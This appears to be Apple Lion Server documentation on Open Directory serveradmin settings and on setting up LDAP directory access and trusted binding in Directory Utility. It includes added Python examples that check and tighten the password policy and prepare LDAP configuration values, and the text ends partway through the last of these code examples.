Open Directory services

Command-line parameters for Open Directory

Command-Line parameters for Open Directory

Open Directory service settings
To change settings for the Open Directory service, use the following parameters with the serveradmin tool. Be sure to add dirserv: to the beginning of any parameter you use.

Parameter                               Default
replicationUnits                        "days"
replicaLastUpdate                       ""
LDAPSettings:LDAPDataBasePath           ""
replicationPeriod                       4
LDAPSettings:LDAPSearchBase             ""
passwordOptionsString                   "usingHistory=0 usingExpirationDate=0 usingHardExpirationDate=0 requiresAlpha=0 requiresNumeric=0 expirationDateGMT=12/31/69 hardExpireDateGMT=12/31/69 maxMinutesUntilChangePassword=0 maxMinutesUntilDisabled=0 maxMinutesOfNonUse=0 maxFailedLoginAttempts=0 minChars=0 maxChars=0 passwordCannotBeName=0"
LDAPSettings:LDAPSSLCertificatePath     ""
masterServer                            ""
LDAPServerType                          "standalone"
replicationWhen                         "periodic"
LDAPSettings:useSSL                     "YES"
LDAPDefaultPrefix                       "dc=domain,dc=com"
LDAPSettings:LDAPTimeoutUnits           "minutes"
LDAPSettings:LDAPServerBackend          "BerkeleyDB"

Note that the default passwordOptionsString enforces no minimum length, no character requirements, and no lockout after failed login attempts (maxFailedLoginAttempts=0). Set a password policy before exposing authentication to the network.
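The passwordOptionsString value, as an added example that is not part of Apple's documentation: parse the string, flag settings that leave accounts open to guessing, and render a tightened string to apply. The thresholds in LAX_RULES and the values in HARDENED are this example's policy choices, not values Apple recommends; the printed serveradmin command uses the `serveradmin settings key = value` form, and the double-quoting of the value is an assumption.

```python
"""Assess and tighten the dirserv:passwordOptionsString policy string."""

# The documented default value, as shown in the table above.
DEFAULT_POLICY = (
    "usingHistory=0 usingExpirationDate=0 usingHardExpirationDate=0 requiresAlpha=0 "
    "requiresNumeric=0 expirationDateGMT=12/31/69 hardExpireDateGMT=12/31/69 "
    "maxMinutesUntilChangePassword=0 maxMinutesUntilDisabled=0 maxMinutesOfNonUse=0 "
    "maxFailedLoginAttempts=0 minChars=0 maxChars=0 passwordCannotBeName=0"
)

# key -> (test that is True when the numeric value is lax, explanation). Assumed thresholds.
LAX_RULES = {
    "minChars": (lambda v: v < 8, "no useful minimum length"),
    "requiresAlpha": (lambda v: v == 0, "letters not required"),
    "requiresNumeric": (lambda v: v == 0, "digits not required"),
    "maxFailedLoginAttempts": (lambda v: v == 0,
                               "unlimited failed logins, so online guessing is never throttled"),
    "passwordCannotBeName": (lambda v: v == 0, "password may equal the account name"),
    "usingHistory": (lambda v: v == 0, "no password history, so a compromised password can return"),
}


def parse_policy(text):
    """'key=value key=value ...' -> dict that keeps the original order."""
    policy = {}
    for token in text.split():
        key, sep, value = token.partition("=")
        if not sep or not key:
            raise ValueError(f"malformed token: {token!r}")
        policy[key] = value
    return policy


def render_policy(policy):
    """Inverse of parse_policy(); the result is what serveradmin expects."""
    return " ".join(f"{key}={value}" for key, value in policy.items())


def assess_policy(policy):
    """Return a human-readable finding for each lax setting, in LAX_RULES order.
    Non-numeric values such as the GMT dates are skipped."""
    findings = []
    for key, (is_lax, why) in LAX_RULES.items():
        value = policy.get(key)
        if value is not None and value.lstrip("-").isdigit() and is_lax(int(value)):
            findings.append(f"{key}={value}: {why}")
    return findings


def harden_policy(policy, **overrides):
    """Copy the policy and replace the given settings. Values are stored as strings
    because that is how the string carries them; unknown keys are rejected so a typo
    cannot silently add a setting the server does not understand."""
    new = dict(policy)
    for key, value in overrides.items():
        if key not in new:
            raise KeyError(f"unknown policy key: {key}")
        new[key] = str(value)
    return new


# Example tightened policy; the numbers are this example's choices.
HARDENED = harden_policy(parse_policy(DEFAULT_POLICY), minChars=12, requiresAlpha=1,
                         requiresNumeric=1, maxFailedLoginAttempts=10,
                         passwordCannotBeName=1, usingHistory=5)

if __name__ == "__main__":
    for finding in assess_policy(parse_policy(DEFAULT_POLICY)):
        print("default policy:", finding)
    # Apply on the Open Directory master with the documented tool:
    print(f'sudo serveradmin settings dirserv:passwordOptionsString = "{render_policy(HARDENED)}"')
```

Read the current value with `sudo serveradmin settings dirserv:passwordOptionsString` and pass that string to parse_policy() before deciding what to change; the lockout count in particular should be chosen with your help desk, since it also lets an attacker lock users out by guessing against their names.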


Lion Server user management

Directory Utility

Get started

About Directory Utility


Directory Utility is used for configuring advanced connections to directory servers. For basic connections to Open Directory and Active Directory domains, use the Network Account Server options in the Login Options section of Users & Groups preferences. For instructions, click the Help button for the Login Options section of Users & Groups preferences.

You can customize the advanced settings of Directory Utility to work with your computer and software applications. You can use Directory Utility (located in Users & Groups preferences) to set up and manage how a computer with Mac OS X Lion or a server with Mac OS X Lion Server accesses directory domains. You can use the advanced features of Directory Utility to configure NFS mount records, services, search policies, and remote computers. The following are advanced features of Directory Utility:
- Connect: configures a client computer or server remotely.
- Services: configures directory servers that users can access.
- Search Policy: configures where the computer searches for user authentication and contact information.
- Directory Editor: configures records and attributes in a directory domain or local directory.

Accessing LDAP directories
You can configure a computer with Mac OS X or a server with Mac OS X Server to access specific LDAP directories, including the LDAP directory of a Mac OS X Server Open Directory master.

Accessing an Active Directory domain
You can configure a computer with Mac OS X or a server with Mac OS X Server to access an Active Directory domain on a Windows 2000 or Windows 2003 or later server.

Accessing an NIS domain
You can create a configuration that specifies how Mac OS X accesses an NIS domain.

Using BSD configuration files
You can use Open Directory to retrieve administrative data from BSD configuration files such as /etc/master.passwd, also known as BSD flat files.

View and edit directory data
You can view or edit raw directory data by using Directory Editor in Directory Utility. For example, you can use Directory Editor to change a user's first short name.


Directory server connections


You can use Users & Groups preferences to connect computers to directory servers. To view the list of directory servers your computer is connected to, click Edit in the Login Options pane of Users & Groups preferences. Your Mac accesses the servers in the list for user information and other administrative data stored in their directory domains.

When you add or delete a server in the Directory Servers list, the entries associated with that directory server are added to or deleted from the Services, Authentication, and Contacts lists. However, if you remove the associated entries from the Services, Authentication, and Contacts lists, the directory server is not removed from the Directory Servers list. For more information about using Users & Groups preferences to add directory servers, search Mac Help for "network account server".

A Mac can connect to an Open Directory, Active Directory, or LDAP directory server. If you don't know which server to connect to, ask your network administrator.

Important: If your computer name contains a hyphen, you might not be able to join or bind to a directory domain such as LDAP or Active Directory. To establish binding, use a computer name that does not contain a hyphen.


Configure access to an Open Directory server


When adding an Open Directory server, you must know the server name or IP address and whether the server uses Secure Sockets Layer (SSL).

Important: If your computer name contains a hyphen, you might not be able to join or bind to a directory domain such as LDAP or Open Directory. To establish binding, use a computer name that does not contain a hyphen.

1. Open System Preferences and click Users & Groups.
2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
3. Click Login Options, then click Join or Edit. If you see an Edit button, your computer already has at least one connection to a directory server.
4. Click Open Directory Utility.
5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
6. Click Services.
7. In the list of services, select LDAPv3 and click the Edit button.
8. Click New, then click Edit. By default, the new directory connection is enabled. For more information about enabling or disabling a directory connection, see Enable or disable directory service.
9. Enter a name in the Configuration Name field.
10. Enter the server name or IP address of the Open Directory server in the Server Name or IP Address field.
11. Select Encrypt using SSL if you want Open Directory to use SSL for connections. Before you select this, ask your Open Directory administrator whether SSL is needed. If Directory Utility can't contact the Open Directory server, you might need to adjust the connection settings. For more information, see Change the connection settings for an LDAP or Open Directory server.
12. Click Search & Mappings.
13. From the "Access this LDAPv3 server using" pop-up menu, choose Open Directory and enter a search base. You must enter a search base suffix or the computer can't find information in the Open Directory domain. Typically, the search base suffix is derived from the server's DNS host name. For example, the search base suffix is dc=ods,dc=example,dc=com for a server whose DNS host name is ods.example.com. For more information about setting up searches and mappings for an LDAP server, see Configure LDAP Searches & Mappings.
14. If the directory server supports trusted binding, click Bind and enter the name of the computer and the name and password of a directory administrator. Binding might be optional. Trusted binding is mutual: each time the computer connects to the LDAP directory, the two authenticate each other. If trusted binding is already set up, or the LDAP directory doesn't support trusted binding, the Bind button does not appear.
Make sure you supplied the correct computer name. If you see an alert saying that a computer record exists, try again using a different computer name, or click Overwrite to replace the existing computer record. The existing record might be abandoned, or it might belong to another computer. If you replace an existing computer record, notify the LDAP directory administrator in case replacing the record disabled another computer; in that case the administrator must give the disabled computer a different name and add it back to the computer group it belonged to. For more information, see Set up trusted binding for an LDAP directory.
15. Click Security. If the Open Directory server requires authentication to connect, select Use authentication when connecting and enter the distinguished name and password of a user account in the directory. An authenticated connection is not mutual: the LDAP server authenticates the client, but the client doesn't authenticate the server, so pair it with SSL or the Kerberos-based security options if a rogue server is a concern. The distinguished name can specify any user account that has permission to read data in the directory. For example, a user account whose short name is dirauth on an LDAP server at ods.example.com has the distinguished name uid=dirauth,cn=users,dc=ods,dc=example,dc=com. For more information, see Change the security policy for an LDAP connection.
Important: If the distinguished name or password is incorrect, you can't log in to the computer using a user account from the LDAP directory.
16. Click OK to finish creating the Open Directory connection.
17. Click OK to finish configuring LDAPv3 options.

If you want the computer to use the LDAP directory you created a configuration for, add the directory to a custom search policy in the Authentication pane and the Contacts pane of Search Policy in Directory Utility, then make sure it is enabled in Services. For information about creating search policies, see Define search policies. For information about enabling a directory service, see Enable or disable directory service.

Important: If you change the IP address and computer name of your Mac server using changeip while you are connected to a directory server, you must disconnect from and reconnect to the directory server to update the directory with the new computer name and IP address. If you don't, the directory continues to use the old computer name and IP address.


Set up Directory Utility on a remote server


You can use Directory Utility on your computer to remotely set up and manage how a Mac server accesses directory services.

1. Open System Preferences on your computer and click Users & Groups.
2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
3. Click Login Options, then click Join or Edit. If you see an Edit button, your computer already has at least one connection to a directory server.
4. Click Open Directory Utility.
5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
6. From the File menu, choose Connect.
7. Enter the following connection and authentication information for the server you want to configure:
Address: Enter the DNS host name or IP address of the server you want to configure.
User Name: Enter the user name of an administrator on the server.
Password: Enter the password for that user name.
8. Click Connect.
9. Click the Services, Search Policy, and Directory Editor tabs and change settings as needed. Changes you make affect the remote server you connected to in the previous steps.
10. From the File menu on your computer, choose Disconnect.


Root account

The root account is an unrestricted administrator account used to make changes to critical system files. You can enable the root account and change its password using Directory Utility.

WARNING: Even if you are logged in as an administrator, you must use the root account or sudo to perform critical system tasks. Avoid using the root account to log in to a computer, remotely or locally. Instead, use the sudo command-line tool to perform tasks that require root privileges. You can restrict access to sudo by listing users in the /etc/sudoers file; edit it with visudo, which checks the syntax before saving, so that a typo doesn't lock every administrator out of sudo. If you do log in using the root account, log out as soon as you finish the tasks that require root privileges.

Enable the root account
You can use Directory Utility to enable the root account. If you enable the root account, use a complex password that contains alphanumeric and special characters so that the password is hard to guess.
1. Open System Preferences and click Users & Groups.
2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
3. Click Login Options, then click Join or Edit. If you see an Edit button, your computer already has at least one connection to a directory server.
4. Click Open Directory Utility.
5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
6. Choose Edit > Enable Root User.

Change the root account password
You can use Directory Utility (opened from Users & Groups preferences) to change the root account password. The warning above applies here as well. When changing the root password, use a complex password that contains alphanumeric and special characters so that the password is hard to guess.
1. Open System Preferences and click Users & Groups.
2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
3. Click Login Options, then click Join or Edit. If you see an Edit button, your computer already has at least one connection to a directory server.
4. Click Open Directory Utility.
5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
6. Choose Edit > Change Root Password.
7. When prompted, enter the new root password in the Password and Verify fields.
8. Click OK.

Lion Server user management

Directory Utility

LDAP directories

Configure access to an LDAP directory


Using Directory Utility, you can specify how your Mac accesses an LDAPv3 directory if you know the DNS host name or IP address of the LDAP directory server. If the directory is not hosted by a server that supplies its own mappings (such as a Mac server), you must know the search base and the template for mapping Mac OS X data to the directory's data. The supported mapping templates are:
Open Directory Server, for a directory that uses the Mac server schema.
Active Directory, for a directory hosted by a Windows 2000, Windows 2003, or later server.
RFC 2307, for most directories hosted by UNIX servers.

The LDAPv3 plug-in fully supports Open Directory replication and failover. If the Open Directory master becomes unavailable, the plug-in falls back to a nearby replica.

To specify custom mappings for the directory data, follow the instructions in Configure access to an LDAP directory manually instead of the instructions here.

Important: If your computer name contains a hyphen, you might not be able to join or bind to a directory domain such as LDAP or Active Directory. To establish binding, use a computer name that does not contain a hyphen.

1. Open System Preferences on your computer and click Users & Groups.
2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
3. Click Login Options, then click Join or Edit. If you see an Edit button, your computer already has at least one connection to a directory server.
4. Click Open Directory Utility.
5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
6. Click Services.
7. In the list of services, select LDAPv3 and click the Edit button.
8. Click New, then click Edit. By default, the new directory connection is enabled. For more information about enabling or disabling a directory connection, see Enable or disable directory service.
9. Enter a name in the Configuration Name field.
10. Enter the LDAP server's DNS host name or IP address in the Server Name or IP Address field.
11. Select Encrypt using SSL if you want Open Directory to use SSL for connections with the LDAP directory. Before you select this, ask your Open Directory administrator whether SSL is needed. If Directory Utility can't contact the LDAP server, you might need to adjust the connection settings. For more information, see Change the connection settings for an LDAP or Open Directory server.
12. Click Search & Mappings.
13. From the "Access this LDAPv3 server using" pop-up menu, choose a template and enter a search base. Typically, the search base suffix is derived from the server's DNS host name. For example, the search base suffix is dc=ods,dc=example,dc=com for a server whose DNS host name is ods.example.com.
14. If the directory server supports trusted binding, click Bind and enter the name of the computer and the name and password of a directory administrator. Binding might be optional. Trusted binding is mutual: each time the computer connects to the LDAP directory, the two authenticate each other. If trusted binding is already set up, or the LDAP directory doesn't support trusted binding, the Bind button does not appear.
Make sure you supply the correct computer name. If you see an alert saying that a computer record exists, try again using a different computer name, or click Overwrite to replace the existing computer record. The existing record might be abandoned, or it might belong to another computer. If you replace an existing computer record, notify the LDAP directory administrator in case replacing the record disabled another computer; in that case the administrator must give the disabled computer a different name and add it back to the computer group it belonged to.
15. Click Security. If the LDAP directory requires authentication to connect, select Use authentication when connecting and enter the distinguished name and password of a user account in the directory. An authenticated connection is not mutual: the LDAP server authenticates the client, but the client doesn't authenticate the server. The distinguished name can specify any user account that has permission to read data in the directory. For example, a user account whose short name is dirauth on an LDAP server at ods.example.com has the distinguished name uid=dirauth,cn=users,dc=ods,dc=example,dc=com.
Important: If the distinguished name or password is incorrect, you can't log in to the computer using a user account from the LDAP directory.
16. Click OK to finish creating the LDAP connection.
17. Click OK to finish configuring LDAPv3 options.

If you want the computer to use the LDAP directory you created a configuration for, add the directory to a custom search policy in the Authentication pane and the Contacts pane of Search Policy in Directory Utility, then make sure it is enabled in Services. For information about creating search policies, see Define search policies. For information about enabling a directory service, see Enable or disable directory service.
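Before typing values into the Search & Mappings and Security panes, it helps to derive them once and check the constraints the two procedures above (the Open Directory one and this LDAP one) spell out: the search base suffix built from the server's DNS host name, the distinguished name of the authentication account in the uid=...,cn=users,... layout, DN escaping per RFC 4514, and the hyphen-in-computer-name problem. The following Python is an added example, not Apple's code or any Directory Utility API; the function names, the warning strings, and the sample host and account names are this example's own assumptions.

```python
"""Pre-flight checks for a Directory Utility LDAPv3 configuration.

Added example, not Apple's code. It derives the search base suffix from
the server's DNS host name, builds the distinguished name of the
authentication account the way the manual's dirauth example does,
escapes DN values per RFC 4514, and flags a computer name containing a
hyphen, which the manual warns may prevent binding.
"""
import re

# Characters that must be escaped inside an RDN attribute value (RFC 4514 s2.4).
_DN_SPECIALS = set(',+"\\<>;')

# One DNS label: letters, digits, inner hyphens, max 63 characters.
_LABEL = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")


def escape_dn_value(value: str) -> str:
    """Escape an attribute value for use inside a DN (RFC 4514)."""
    out = []
    for i, ch in enumerate(value):
        if ch in _DN_SPECIALS:
            out.append("\\" + ch)
        elif ch == "#" and i == 0:
            out.append("\\#")
        elif ch == " " and (i == 0 or i == len(value) - 1):
            out.append("\\ ")
        elif ord(ch) < 0x20:
            out.append("\\%02x" % ord(ch))
        else:
            out.append(ch)
    return "".join(out)


def search_base_from_hostname(hostname: str) -> str:
    """dc=ods,dc=example,dc=com for ods.example.com (the manual's convention)."""
    labels = hostname.strip().rstrip(".").lower().split(".")
    if len(labels) < 2 or not all(_LABEL.match(label) for label in labels):
        raise ValueError(f"not a usable DNS host name: {hostname!r}")
    return ",".join("dc=" + escape_dn_value(label) for label in labels)


def user_dn(short_name: str, search_base: str, container: str = "cn=users") -> str:
    """uid=<short name>,cn=users,<search base>: the Open Directory user layout."""
    if not short_name:
        raise ValueError("short name is empty")
    return f"uid={escape_dn_value(short_name)},{container},{search_base}"


def check_computer_name(name: str) -> list:
    """Return warnings for a computer name that may fail to bind (assumed wording)."""
    problems = []
    if not name:
        problems.append("computer name is empty")
    if "-" in name:
        problems.append("computer name contains a hyphen; binding may fail")
    if any(c.isspace() for c in name):
        problems.append("computer name contains whitespace")
    return problems


def plan_ldap_config(server: str, computer_name: str, dirauth: str = None,
                     use_ssl: bool = True) -> dict:
    """Assemble the values the Search & Mappings and Security panes need."""
    base = search_base_from_hostname(server)
    cfg = {
        "server": server,
        "search_base": base,
        "ssl": use_ssl,
        "bind_dn": user_dn(dirauth, base) if dirauth else None,
        "warnings": check_computer_name(computer_name),
    }
    # An authenticated (non-trusted) connection carries the bind password;
    # without SSL that password crosses the network in clear text.
    if dirauth and not use_ssl:
        cfg["warnings"].append(
            "authenticated connection without SSL sends the bind password in clear text")
    return cfg


if __name__ == "__main__":
    # Constructed sample input matching the manual's example names.
    print(plan_ldap_config("ods.example.com", "lab-mac01", "dirauth", use_ssl=False))
```

The escaping matters when an account's short name or a DNS label contains a comma, plus sign, or leading space; pasting such a DN unescaped into the Security pane produces a bind that fails with an invalid-DN error rather than a clear message.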


Reconfigure LDAP directory access


You can change, duplicate, or delete the configuration settings for an LDAP server. If your LDAP server access requirements change, you can change them. If you are adding a similar LDAP server that needs only minor connection setting changes, you can duplicate the settings of an existing LDAP connection. If you no longer need an LDAP connection, you can delete it.

Change a configuration for accessing an LDAP directory
You can use Directory Utility to change the settings of an LDAP directory configuration. The configuration settings specify how Open Directory accesses an LDAPv2 or LDAPv3 directory. If the LDAP configuration was provided by DHCP, it can't be changed, so this type of configuration is dimmed in the list of LDAP configurations.
1. Open System Preferences on your computer and click Users & Groups.
2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
3. Click Login Options, then click Join or Edit. If you see an Edit button, your computer already has at least one connection to a directory server.
4. Click Open Directory Utility.
5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
6. Click Services.
7. In the list of services, select LDAPv3 and click the Edit button.
8. If the list of server configurations is hidden, click Show Options.
9. Make changes as needed to the following settings:
Enable: Select or deselect the checkbox to enable or disable access to an LDAP directory server.
Configuration Name: Double-click a configuration name to edit it.
Server Name or IP Address: Double-click a server name or IP address to change it.
LDAP Mapping: From the pop-up menu, choose a template, enter the search base suffix for the LDAP directory, and click OK. If you choose a template, you must enter a search base suffix or the computer can't find information in the LDAP directory. Typically, the search base suffix is derived from the server's DNS host name. For example, for a server whose DNS host name is ods.example.com, the search base suffix is dc=ods,dc=example,dc=com. If you choose From Server instead of a template, a search base suffix is not needed; Open Directory assumes the search base suffix is the first level of the LDAP directory. If you choose Custom, you must set up mappings between the Mac OS X record types and attributes and the classes and attributes of the LDAP directory you're connecting to. For more information, see Configure LDAP Searches & Mappings.
SSL: Select or deselect the checkbox to enable or disable encrypted communications using SSL. Before you select the SSL checkbox, ask your Open Directory administrator whether SSL is needed.
10. To change the following default settings for this LDAP configuration, click Edit to display the options for the selected LDAP configuration, make changes, and click OK when you finish:
Click Connection to set timeout options, specify a custom port, ignore server referrals, or force use of the LDAPv2 (read-only) protocol. For more information, see Change the connection settings for an LDAP or Open Directory server.
Click Search & Mappings to set up searches and mappings for an LDAP server. For more information, see Configure LDAP Searches & Mappings.
Click Security to set up an authenticated connection (instead of trusted binding) and other security policy options. For more information, see Change the security policy for an LDAP connection.
Click Bind to set up trusted binding, or click Unbind to stop trusted binding. (You might not see these buttons if the LDAP directory doesn't permit trusted binding.) For more information, see Set up trusted binding for an LDAP directory.
11. To finish changing the configuration, click OK.

Duplicate a configuration for accessing an LDAP directory
You can use Directory Utility to duplicate a configuration that specifies how Mac OS X accesses an LDAPv3 or LDAPv2 directory. After duplicating an LDAP directory configuration, you can change its settings to make it different from the original.
1. On your computer, open System Preferences and click Users & Groups.
2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
3. Click Login Options, then click Join or Edit. If you see an Edit button, your computer already has at least one connection to a directory server.
4. Click Open Directory Utility.
5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
6. Click Services.
7. In the list of services, select LDAPv3 and click the Edit button.
8. If the list of server configurations is hidden, click Show Options.
9. In the list, select a server configuration and click Duplicate.
10. Change the duplicate configuration's settings:
Enable: Select or deselect the checkbox to enable or disable access to an LDAP directory server.
Configuration Name: Double-click a configuration name to edit it.
Server Name or IP Address: Double-click a server name or IP address to change it.
LDAP Mapping: Choose a template from the pop-up menu, then enter the search base suffix for the LDAP directory and click OK. If you choose a template, you must enter a search base suffix or the computer can't find information in the LDAP directory. Typically, the search base suffix is derived from the server's DNS host name. For example, for a server whose DNS host name is ods.example.com, the search base suffix is dc=ods,dc=example,dc=com. If you choose From Server instead of a template, a search base suffix is not needed; Open Directory assumes the search base suffix is the first level of the LDAP directory. If you choose Custom, you must set up mappings between the Mac OS X record types and attributes and the classes and attributes of the LDAP directory you're connecting to. For more information, see Configure LDAP Searches & Mappings.
SSL: Select or deselect the checkbox to enable or disable encrypted communications using SSL. Before you select the SSL checkbox, ask your Open Directory administrator whether SSL is needed.
11. To change the following default settings for the duplicate LDAP configuration, click Edit to display the options, make changes, and click OK when you finish:
Click Connection to set timeout options, specify a custom port, ignore server referrals, or force use of the LDAPv2 (read-only) protocol. For more information, see Change the connection settings for an LDAP or Open Directory server.
Click Search & Mappings to set up searches and mappings for an LDAP server. For more information, see Configure LDAP Searches & Mappings.
Click Security to set up an authenticated connection (instead of trusted binding) and other security policy options. For more information, see Change the security policy for an LDAP connection.
Click Bind to set up trusted binding (if the LDAP directory supports it), or click Unbind to stop trusted binding. (You might not see these buttons if the LDAP directory doesn't permit trusted binding.) For more information, see Set up trusted binding for an LDAP directory.
12. To finish changing the duplicate configuration, click OK.
13. If you want the computer to use the LDAP directory specified by the duplicate configuration, add the directory to a custom search policy in the Authentication or Contacts pane of Search Policy in Directory Utility and make sure LDAPv3 is enabled in the Services pane. For more information, see Enable or disable directory service and Define search policies.

Delete a configuration for accessing an LDAP or Open Directory server
You can use Directory Utility to delete a configuration that specifies how the computer accesses an LDAPv3 or LDAPv2 directory. If the LDAP configuration was provided by DHCP, it can't be deleted, so this configuration is dimmed in the list of LDAP configurations.
1. Open System Preferences on your computer and click Users & Groups.
2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
3. Click Login Options, then click Join or Edit. If you see an Edit button, your computer already has at least one connection to a directory server.
4. Click Open Directory Utility.
5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
6. Click Services.
7. In the list of services, select LDAPv3 and click the Edit button.
8. If the list of server configurations is hidden, click Show Options.
9. In the list, select a server configuration and click Delete, then click OK.
10. Do one of the following:
If you see an alert saying the computer is bound to the LDAP directory and you want to stop trusted binding, click OK and then enter the name and password of an LDAP directory administrator (not a local computer administrator).
If you see an alert saying the computer can't contact the LDAP server, you can click OK to forcibly stop trusted binding. If you forcibly stop trusted binding, this computer still has a computer record in the LDAP directory. Notify the LDAP directory administrator so the administrator knows to remove the computer from its computer group.

The deleted configuration is removed from the custom search policies for authentication and contacts.


Set up trusted binding for an LDAP directory


You can use Directory Utility to set up trusted binding between the computer and an LDAP directory that supports trusted binding. The binding is mutually authenticated through an authenticated computer record that is created in the directory when you set up trusted binding.

The computer can't be configured to use both trusted LDAP binding and a DHCP-supplied LDAP directory. Trusted LDAP binding is inherently static, but DHCP-supplied LDAP is dynamic.

Important: If you are in a dual directory configuration, avoid trusted binding to a server that is not being used for authentication. This prevents Kerberos realm conflicts between the two directory servers. Also avoid trusted binding for clients whose host name is not statically assigned: a change in host name changes the name of the computer account and may require rebinding. Use anonymous binding instead.

Important: In Lion Server, every server is an Open Directory master by default, and every Open Directory master has a diradmin user. When binding two directory servers, they must not have the same directory administrator user name (diradmin). If two default installations of Lion Server are bound to each other, the configuration is invalid and can cause random failures. Make one Open Directory master a standalone server, then recreate it using Server Admin with a unique user name for the directory administrator instead of the default diradmin.

To use trusted LDAP binding, clients need Mac OS X v10.6 or later or Mac OS X Server v10.6 or later. Clients using v10.5 can use anonymous binding but can't set up trusted binding.

1. Open System Preferences on your computer and click Users & Groups.
2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
3. Click Login Options, then click Edit.
4. Click Open Directory Utility.
5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
6. Click Services.
7. In the list of services, select LDAPv3 and click the Edit button.
8. If the list of server configurations is hidden, click Show Options.
9. In the list, select a server configuration and click Edit. Several options appear, including the Bind button. If the Bind button doesn't appear, the LDAP directory doesn't support trusted binding.
10. Click Bind, then enter the following credentials and click OK: the name of the computer, and the name and password of an LDAP directory domain administrator. The computer name can't be in use by another computer for trusted binding or other network services.
11. Verify that you supplied the correct computer name. If you see an alert saying that a computer record exists, click Cancel to go back and change the computer name, or click Overwrite to replace the existing computer record. The existing record might be abandoned, or it might belong to another computer. If you replace an existing computer record, notify the LDAP directory administrator so that replacing the record doesn't silently disable another computer. In that situation, the LDAP directory administrator must give the disabled computer another name and add it back to the computer group it belonged to under that new name.
12. To finish setting up trusted binding, click OK.


Change the security policy for an LDAP connection


Using Directory Utility, you can configure a stricter security policy for an LDAPv3 connection than the security policy of the LDAP directory. For example, if the LDAP directorys s ecurity policy permits clear-text pass words, you can set an LDAPv3 connection to not permit clear-text pass words. Setting a stricter s ecurity policy protects your computer from a malicious hacker trying to us e a rogue LDAP s erver to gain control of your computer. The computer must communicate with the LDAP server to s how the state of the security options . Therefore when you change security options for an LDAPv3 connection, the computers authentication search policy s hould include the LDAPv3 connection. The permiss ible s ettings of an LDAPv3 connections security options are subject to the LDAP servers security capabilities and requirements. For example, if the LDAP server doesnt s upport Kerberos authentication, several LDAPv3 connection s ecurity options are disabled.

1. Open System Preferences on your computer and click Users & Groups.
2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
3. Click Login Options, then click Join or Edit.
4. Click Open Directory Utility.
5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
6. Click Search Policy.
7. Click Authentication and make sure the LDAPv3 directory you want is listed in the search policy. For more information about adding the LDAPv3 directory to the authentication search policy, see Define search policies.
8. Click Services.
9. In the list of services, select LDAPv3 and click the Edit button (/).
10. If the list of server configurations is hidden, click Show Options.
11. Select the configuration for the directory you want, then click Edit.
12. Click Security and then change any of the following settings.

Note: The security settings here and on the corresponding LDAP server are determined when the LDAP connection is set up. The settings aren't updated when server settings are changed. If any of the last four options are selected but disabled, the LDAP directory requires them. If any of these options are unselected and disabled, the LDAP server doesn't support them.

Use authentication when connecting: Determines whether the LDAPv3 connection authenticates itself to the LDAP directory by supplying the specified distinguished name and password. This option is not visible if the LDAPv3 connection uses trusted binding with the LDAP directory.

Bound to the directory as: Specifies the credentials the LDAPv3 connection uses for trusted binding with the LDAP directory. This option and the credentials can't be changed here. Instead, you can unbind and then bind again with different credentials. For more information, see Stop trusted binding with an LDAP directory and Set up trusted binding for an LDAP directory. This option is not visible unless the LDAPv3 connection uses trusted binding.

Disable clear text passwords: Determines whether the password may be sent as clear text when it can't be validated using an authentication method that protects the password in transit. When selected, the connection refuses to fall back to a clear-text bind instead of sending the password unprotected.

Digitally sign all packets (requires Kerberos): Certifies that directory data from the LDAP server hasn't been intercepted and modified by another computer while en route to your computer.

Encrypt all packets (requires SSL or Kerberos): Requires the LDAP server to encrypt directory data using SSL or Kerberos before sending it to your computer. Before you select this option, ask your Open Directory administrator whether SSL is needed.

Block man-in-the-middle attacks (requires Kerberos): Protects against a rogue server posing as the LDAP server. Best used together with the Digitally sign all packets option.
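Because the last four options are greyed out whenever the server cannot support them, it helps to know what the server advertises before opening Directory Utility. The following is an added example, not code from this guide or from Apple: it reads the LDIF that `ldapsearch -x -H ldap://ldap.example.com -b "" -s base supportedSASLMechanisms supportedExtension` prints for the root DSE, maps it onto the four options (signing and man-in-the-middle protection need Kerberos, which is the GSSAPI SASL mechanism; encryption needs Kerberos or TLS; refusing clear text needs a SASL mechanism that does not carry the password in the clear), and builds a dsconfigldap command that requests exactly the protections the server can honour. The dsconfigldap flag letters, the server name and the sample root DSE are assumptions; the sample is constructed.

```python
"""Map an LDAP server's root DSE onto Directory Utility's LDAPv3 security options.

Added example, not part of Apple's documentation or tools. Flag letters in
strict_dsconfigldap() are assumed from dsconfigldap(8) on Lion; verify them
against the installed version before use. SAMPLE_ROOTDSE is constructed.
"""
import re

STARTTLS_OID = "1.3.6.1.4.1.1466.20037"   # RFC 4511 Start TLS extended operation
# SASL mechanisms that never put the password on the wire in the clear.
NON_CLEARTEXT_MECHS = set(["GSSAPI", "DIGEST-MD5", "CRAM-MD5"])


def parse_ldif_attrs(ldif_text):
    """Return {attribute: [values]} for a single LDIF entry.

    Folded continuation lines (leading space) are joined; comments, the
    version line and the dn line are ignored.
    """
    logical = []
    for raw in ldif_text.splitlines():
        if raw.startswith(" ") and logical:
            logical[-1] += raw[1:]
        else:
            logical.append(raw)
    attrs = {}
    for line in logical:
        if not line or line.startswith("#") or line.startswith("version:"):
            continue
        m = re.match(r"^([A-Za-z][\w.;-]*):\s*(.*)$", line)
        if not m or m.group(1).lower() == "dn":
            continue
        attrs.setdefault(m.group(1), []).append(m.group(2))
    return attrs


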